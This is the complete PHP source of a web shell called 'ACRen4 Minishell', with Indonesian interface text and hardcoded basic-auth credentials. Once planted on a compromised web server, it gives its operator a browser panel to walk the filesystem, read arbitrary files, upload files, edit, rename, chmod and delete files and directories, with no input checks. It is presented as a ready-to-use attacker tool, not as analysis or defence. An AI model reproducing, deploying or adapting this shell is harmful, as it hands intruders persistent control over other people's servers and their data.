ACRen4 Minishell

1. <?php
2. // --- pop-up
3.  
4. $user = "FYK";
5.  
6. $pass = "ACRen42509";
7.  
8. if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
9.  
10. {
11.  
12. header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
13.  
14. header("HTTP/1.0 401 Unauthorized");
15.  
16. exit();
17.  
18. }
19.  
20. // --- php shell
21.  
22. error_reporting(0);
23. set_time_limit(0);
24.  
25. if(get_magic_quotes_gpc()){
26. foreach($_POST as $key=>$value){
27. $_POST[$key] = stripslashes($value);
28. }
29. }
30. echo '<!DOCTYPE HTML>
31. <html>
32. <head>
33. <link href="" rel="stylesheet" type="text/css">
34. <title>ACRen4 Minishell</title>
35. <style>
36. body{background-image: url(http://farrelyk.cf/rena.png);background-position:top left;background-repeat: repeat-x repeat-y;
37. }
38. #content tr:hover{
39. background-color: blue;
40. text-shadow:0px 0px 10px #fff;
41. }
42. #content .first{
43. background-color: lime;
44. }
45. table{
46. border: 1px #000000 dotted;
47. }
48. a{
49. color:white;
50. text-decoration: none;
51. }
52. a:hover{
53. color:blue;
54. text-shadow:0px 0px 10px #ffffff;
55. }
56. input,select,textarea{
57. border: 1px #000000 solid;
58. -moz-border-radius: 5px;
59. -webkit-border-radius:5px;
60. border-radius:5px;
61. }
62. </style>
63. </head>
64. <body>
65. <h1><center><font color="aqua">ACRen4 Minishell</font></center></h1>
66. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
67. <tr><td><font color="white">Path :</font> ';
68. if(isset($_GET['path'])){
69. $path = $_GET['path'];
70. }else{
71. $path = getcwd();
72. }
73. $path = str_replace('\\','/',$path);
74. $paths = explode('/',$path);
75.  
76. foreach($paths as $id=>$pat){
77. if($pat == '' && $id == 0){
78. $a = true;
79. echo '<a href="?path=/">/</a>';
80. continue;
81. }
82. if($pat == '') continue;
83. echo '<a href="?path=';
84. for($i=0;$i<=$id;$i++){
85. echo "$paths[$i]";
86. if($i != $id) echo "/";
87. }
88. echo '">'.$pat.'</a>/';
89. }
90. echo '</td></tr><tr><td>';
91. if(isset($_FILES['file'])){
92. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
93. echo '<font color="green">Upload Berhasil</font><br />';
94. }else{
95. echo '<font color="red">Upload Gagal</font><br/>';
96. }
97. }
98. echo '<form enctype="multipart/form-data" method="POST">
99. <font color="white">File Upload :</font> <input type="file" name="file" />
100. <input type="submit" value="upload" />
101. </form>
102. </td></tr>';
103. if(isset($_GET['filesrc'])){
104. echo "<tr><td>Current File : ";
105. echo $_GET['filesrc'];
106. echo '</tr></td></table><br />';
107. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
108. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
109. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
110. if($_POST['opt'] == 'chmod'){
111. if(isset($_POST['perm'])){
112. if(chmod($_POST['path'],$_POST['perm'])){
113. echo '<font color="green">Change Permission Berhasil</font><br/>';
114. }else{
115. echo '<font color="red">Change Permission Gagal</font><br />';
116. }
117. }
118. echo '<form method="POST">
119. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms
120.  
121. ($_POST['path'])), -4).'" />
122. <input type="hidden" name="path" value="'.$_POST['path'].'">
123. <input type="hidden" name="opt" value="chmod">
124. <input type="submit" value="Go" />
125. </form>';
126. }elseif($_POST['opt'] == 'rename'){
127. if(isset($_POST['newname'])){
128. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
129. echo '<font color="green">Ganti Nama Berhasil</font><br/>';
130. }else{
131. echo '<font color="red">Ganti Nama Gagal</font><br />';
132. }
133. $_POST['name'] = $_POST['newname'];
134. }
135. echo '<form method="POST">
136. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
137. <input type="hidden" name="path" value="'.$_POST['path'].'">
138. <input type="hidden" name="opt" value="rename">
139. <input type="submit" value="Go" />
140. </form>';
141. }elseif($_POST['opt'] == 'edit'){
142. if(isset($_POST['src'])){
143. $fp = fopen($_POST['path'],'w');
144. if(fwrite($fp,$_POST['src'])){
145. echo '<font color="green">Berhasil Edit File</font><br/>';
146. }else{
147. echo '<font color="red">Gagal Edit File</font><br/>';
148. }
149. fclose($fp);
150. }
151. echo '<form method="POST">
152. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST
153.  
154. ['path'])).'</textarea><br />
155. <input type="hidden" name="path" value="'.$_POST['path'].'">
156. <input type="hidden" name="opt" value="edit">
157. <input type="submit" value="Save" />
158. </form>';
159. }
160. echo '</center>';
161. }else{
162. echo '</table><br/><center>';
163. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
164. if($_POST['type'] == 'dir'){
165. if(rmdir($_POST['path'])){
166. echo '<font color="green">Directory Terhapus</font><br/>';
167. }else{
168. echo '<font color="red">Directory Gagal Terhapus
169.  
170.  
171.  
172.  
173.  
174. </font><br/>';
175. }
176. }elseif($_POST['type'] == 'file'){
177. if(unlink($_POST['path'])){
178. echo '<font color="green">File Terhapus</font><br/>';
179. }else{
180. echo '<font color="red">File Gagal Dihapus</font><br/>';
181. }
182. }
183. }
184. echo '</center>';
185. $scandir = scandir($path);
186. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1"
187.  
188. align="center">
189. <tr class="first">
190. <td><center>Name</peller></center></td>
191. <td><center>Size</peller></center></td>
192. <td><center>Permission</peller></center></td>
193. <td><center>Modify</peller></center></td>
194. </tr>';
195.  
196. foreach($scandir as $dir){
197. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
198. echo '<tr>
199. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
200. <td><center>--</center></td>
201. <td><center>';
202. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
203. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
204. echo perms($path.'/'.$dir);
205. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
206.  
207. echo '</center></td>
208. <td><center><form method="POST" action="?option&path='.$path.'">
209. <select name="opt">
210. <option value="">Select</option>
211. <option value="delete">Delete</option>
212. <option value="chmod">Chmod</option>
213. <option value="rename">Rename</option>
214. </select>
215. <input type="hidden" name="type" value="dir">
216. <input type="hidden" name="name" value="'.$dir.'">
217. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
218. <input type="submit" value=">">
219. </form></center></td>
220. </tr>';
221. }
222. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
223. foreach($scandir as $file){
224. if(!is_file($path.'/'.$file)) continue;
225. $size = filesize($path.'/'.$file)/1024;
226. $size = round($size,3);
227. if($size >= 1024){
228. $size = round($size/1024,2).' MB';
229. }else{
230. $size = $size.' KB';
231. }
232.  
233. echo '<tr>
234. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
235. <td><center>'.$size.'</center></td>
236. <td><center>';
237. if(is_writable($path.'/'.$file)) echo '<font color="green">';
238. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
239. echo perms($path.'/'.$file);
240. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
241. echo '</center></td>
242. <td><center><form method="POST" action="?option&path='.$path.'">
243. <select name="opt">
244. <option value="">Select</option>
245. <option value="delete">Delete</option>
246. <option value="chmod">Chmod</option>
247. <option value="rename">Rename</option>
248. <option value="edit">Edit</option>
249. </select>
250. <input type="hidden" name="type" value="file">
251. <input type="hidden" name="name" value="'.$file.'">
252. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
253. <input type="submit" value=">">
254. </form></center></td>
255. </tr>';
256. }
257. echo '</table>
258. </div>';
259. }
260. echo '<center><br/>[-] Copyright 2017 [-]</center>
261. </body>
262. </html>';
263. function perms($file){
264. $perms = fileperms($file);
265.  
266. if (($perms & 0xC000) == 0xC000) {
267. // Socket
268. $info = 's';
269. } elseif (($perms & 0xA000) == 0xA000) {
270. // Symbolic Link
271. $info = 'l';
272. } elseif (($perms & 0x8000) == 0x8000) {
273. // Regular
274. $info = '-';
275. } elseif (($perms & 0x6000) == 0x6000) {
276. // Block special
277. $info = 'b';
278. } elseif (($perms & 0x4000) == 0x4000) {
279. // Directory
280. $info = 'd';
281. } elseif (($perms & 0x2000) == 0x2000) {
282. // Character special
283. $info = 'c';
284. } elseif (($perms & 0x1000) == 0x1000) {
285. // FIFO pipe
286. $info = 'p';
287. } else {
288. // Unknown
289. $info = 'u';
290. }
291.  
292. // Owner
293. $info .= (($perms & 0x0100) ? 'r' : '-');
294. $info .= (($perms & 0x0080) ? 'w' : '-');
295. $info .= (($perms & 0x0040) ?
296. (($perms & 0x0800) ? 's' : 'x' ) :
297. (($perms & 0x0800) ? 'S' : '-'));
298.  
299. // Group
300. $info .= (($perms & 0x0020) ? 'r' : '-');
301. $info .= (($perms & 0x0010) ? 'w' : '-');
302. $info .= (($perms & 0x0008) ?
303. (($perms & 0x0400) ? 's' : 'x' ) :
304. (($perms & 0x0400) ? 'S' : '-'));
305.  
306. // World
307. $info .= (($perms & 0x0004) ? 'r' : '-');
308. $info .= (($perms & 0x0002) ? 'w' : '-');
309. $info .= (($perms & 0x0001) ?
310. (($perms & 0x0200) ? 't' : 'x' ) :
311. (($perms & 0x0200) ? 'T' : '-'));
312.  
313. return $info;
314. }
315. ?>